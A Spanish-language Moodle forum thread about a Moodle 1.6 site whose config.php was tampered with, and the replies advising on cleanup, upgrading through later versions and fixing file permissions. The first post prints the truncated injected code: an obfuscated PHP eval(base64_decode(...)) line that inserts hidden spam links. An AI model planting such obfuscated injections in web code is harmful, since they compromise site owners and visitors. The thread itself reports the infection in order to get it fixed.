Problemas con el editor de Moodle con la opción activar edición.

Problemas con el editor de Moodle con la opción activar edición.

de Ricardo Domínguez -
Número de respuestas: 10

Utilizo la versión 1.6 de Moodle, hace un tiempo me desapareció el editor, después de investigar un poco descubrí que el archivo config.php había sido modificado apareciendo las siguientes líneas en el código:

<?php /*// 15f5b7e7da25ae61fc378f3ac1361343 */ eval(base64_decode('JGxpbmtzID0gJw0KPGZvbnQgc3R5bGU9InBvc2l0aW9uOiBhYnNvbHV0ZTtvdmVyZmxvdzogaGlkZGVuO2hlaWdodDogMDt3aWR0aDogMCI+eGVleDYyNDAyPC9mb250Pg0KPGEgaHJlZj0iaHR0cDovL3VzdWFyaW9zLm11bHRpbWFuaWEuZXMvaml3ZWNhbmUvaW5kZXguaHRtbCIgc3R5bGU9ImRpc3BsYXk6bm9uZSI+RnV6eiBKYWNrc29uIC0gVFJBQ0swODwvYT4NCjxhIGhyZWY9Imh0dHA6Ly91c3Vhcmlvcy5tdWx0aW1hbmlhLmVzL2ppd2VjYW5lL2luZGV4MS5odG1sIiBzdHlsZT0iZGlzcGxheTpub25lIj5CZXRvIEthaXNlciAtIFJpY2lmaSAoYm9udXMpPC9hPg0KPGEgaHJlZj0iaHR0cDovL3VzdWFyaW9zLm11bHRpbWFuaWEuZXMvaml3ZWNhbmUvaW5kZXgyLmh0bWwiIHN0eWxlPSJkaXNwbGF5Om5vbmUiPkNoZWNrZmllbGQgLSBHcmFzc2xhbmRzPC9hPg0KPGEgaHJlZj0iaHR0cDovL3VzdWFyaW9zLm11bHRpbWFuaWEuZXMvaml3ZWNhbmUvaW5kZXgzLmh0bWwiIHN0eWxlPSJkaXNwbGF5Om5vbmUiPkJvYiBCcm9va21leWVyIGFuZCBLZW5ueSBXaGVlbGVyIC0gU3RyYW5nZSBPbmU8L2E+DQo8YSBocmVmPSJodHRwOi8vdXN1YXJpb3MubXVsdGltYW5pYS5lcy9qaXdlY2FuZS9pbmRleDQuaHRtbCIgc3R5bGU9ImRpc3BsYXk6bm9uZSI+UG9jb3MgUGVybyBMb2NvcyAtIENsb3NlcjwvYT4NCjxhIGhyZWY9Imh0dHA6Ly91c3Vhcmlvcy5tdWx0aW1hbmlhLmVzL3llZGVidWIvaW5kZXguaHRtbCIgc3R5bGU9ImRpc3BsYXk6bm9uZSI+VHJpY2sgRGFkZHkgZmVhdHVyaW5nIEtoaWEgLSBKLiBPLiBELiBELiAoZXhwbGljaXQpPC9hPg0KPGEgaHJlZj0iaHR0cDovL3VzdWFyaW9zLm11bHRpbWFuaWEuZXMveWVkZWJ1Yi9pbmRleDEuaHRtbCIgc3R5bGU9ImRpc3BsYXk6bm9uZSI+V2h5dGUgT3dsZSAtIFUgUiBBIFJhaW5ib3c8L2E+DQo8YSBocmVmPSJodHRwOi8vdXN1YXJpb3MubXVsdGltYW5pYS5lcy95ZWRlYnViL2luZGV4Mi5odG1sIiBzdHlsZT0iZGlzcGxheTpub25lIj4zMTEgLSBTaW5nbGUgdmVyc2lvbjwvYT4NCjxhIGhyZWY9Imh0dHA6Ly91c3Vhcmlvcy5tdWx0aW1hbmlhLmVzL3llZG.....

El problema lo solucioné eliminando estas lineas. De esta manera volvió a funcionar el editor.
Desde hace un poco tiempo me ha vuelto a suceder el mismo problema, pero ahora después de realizar la misma acción, sigue sin funcionarme el editor en uno de los cursos que tengo en la plataforma. El editor en modo estudiante sí que funciona y en el resto de los cursos también. ¿Qué archivo podría estar dañado ahora?
Supongo que es un problema de vulnerabilidad de esta versión, pero ahora tengo todos los materiales del curso en marcha y la migración a una versión posterior preferiría hacerla cuando el curso acabe.

¿Alguien podría sugerirme alguna solución?

Gracias

Promedio de valoraciones: -
En respuesta a Ricardo Domínguez

Re: Problemas con el editor de Moodle con la opción activar edición.

de Wenceslao Fernández -

Hola Ricardo sonrisa

Tus razones tendrás para seguir con Moodle 1.6 tantos años después, pero ten por seguro que si el sistema es vulnerable y ya han entrado dos veces, seguirán haciéndolo e infectando a tus usuarios y visitantes (lo cual es un tanto irresponsable por tu parte).

En este caso, te sugiero que descargues la última versión de la serie, la 1.6.9 desde Moodle (http://download.moodle.org/) y sustituyas TODOS los archivos de tu sitio. Es posible también, si el problema es sólo eun un curso, que se haya corrompido alguna tabla de la base de datos, por lo que debieras entrar a la base datos a revisar/reparar (previo a sustituir los archivos de Moodle).

Un saludo

En respuesta a Wenceslao Fernández

Re: Problemas con el editor de Moodle con la opción activar edición.

de Ricardo Domínguez -

Hola Wenceslao, gracias por tus consejos.  Empecé con la versión 1.6 de Moodle porque veía que no me daba problemas de instalación en  el servidor. Ahora tengo todos los materiales del curso en marcha y en cuanto acabe actualizaré a la última versión.

Gracias, por tu ayuda.

En respuesta a Wenceslao Fernández

Re: Problemas con el editor de Moodle con la opción activar edición.

de Ricardo Domínguez -

Hola Wenceslao,

¿Qué proceso podría seguir para cambiar de versión conservando todos los datos y actividades que están en marcha en los cursos?

Gracias

En respuesta a Ricardo Domínguez

Re: Problemas con el editor de Moodle con la opción activar edición.

de Wenceslao Fernández -

Hola Ricardo sonrisa

En tu caso debieras actualizar a la versión 1.9.x, lo que implica pasar antes por la 1.7 y la 1.8, sin embargo tienes el detalle de la codificación UTF8 que se puso en la 1.7. En principio debieras hacer una copia de seguridad de todo tu sitio (carpeta moodle, carpeta moodledata y base de datos) por si algo saliese mal y tuvieses que revertir todo. El proceso es simple

Renombar la carpeta moodle a moodle_1_6, por ejemplo

Subir los archivos de moodle 1.7.+ a una carpeta que llamarás moodle

Copiar el acrchivo config.php de moodle_1_6 a la nueva carpeta moodle

Entrar con el navegador a tu dirección con cuenta de administrador y seguir las instrucciones. Si todo va bien, repites el proceso para la 1.8 y la 1.9.

Si subes previamente todos los archivos de las versiones y los dejas renombrados en el servidor (moodle_17, moodle_18, moodle_19), y las vas renombrando según actualices, el proceso de actualización, si todo va bien, no te llevaría ni una hora.

Un saludo

En respuesta a Wenceslao Fernández

Re: Problemas con el editor de Moodle con la opción activar edición.

de Ricardo Domínguez -

Muchas gracias pot tu ayuda.

 

Saludos

En respuesta a Ricardo Domínguez

Re: Problemas con el editor de Moodle con la opción activar edición.

de Carlos Gutierrez -

Estoy totalmente de acuerdo, hay que estar actualizado, pero yo tengo la version m1.9 y tengo algún problemilla de seguridad, algún rastreador consigue entrar en la ficha de algún alumno de forma esporádica, pero me preocupa.

Por otro lado el editor de HTML no funciona o funciona mal según el navagador que useis. A mi antes me iva mal con mocilla y bien con el xp pero ahora es al revés.

En respuesta a Carlos Gutierrez

Re: Problemas con el editor de Moodle con la opción activar edición.

de Ricardo Domínguez -

A mí hasta ahora me estaba funcionando bien en el Explorer y en Firefox, pero no en Google Crome.

Gracias por tu información

En respuesta a Carlos Gutierrez

Re: Problemas con el editor de Moodle con la opción activar edición.

de Carlos Bravo Reyes -

Carlos

Sugiero que revises los permisos que tienes en toda las carpetas de Moodle. Es posible que los permisos dados permitan este tipo de filtración, algo habitual.

 

Saludos

En respuesta a Carlos Bravo Reyes

Re: Problemas con el editor de Moodle con la opción activar edición.

de Ricardo Domínguez -

Al archivo config le he quitado los permisos de escritura, pero aún así es vulnerable.

Gracias por tu ayuda

En respuesta a Ricardo Domínguez

Re: Problemas con el editor de Moodle con la opción activar edición.

de Carlos Gutierrez -

Se que para google crome hay que meter una información en algún sitio, pero perdí la información que tenia guardada para hacerlo.

La copgí del foro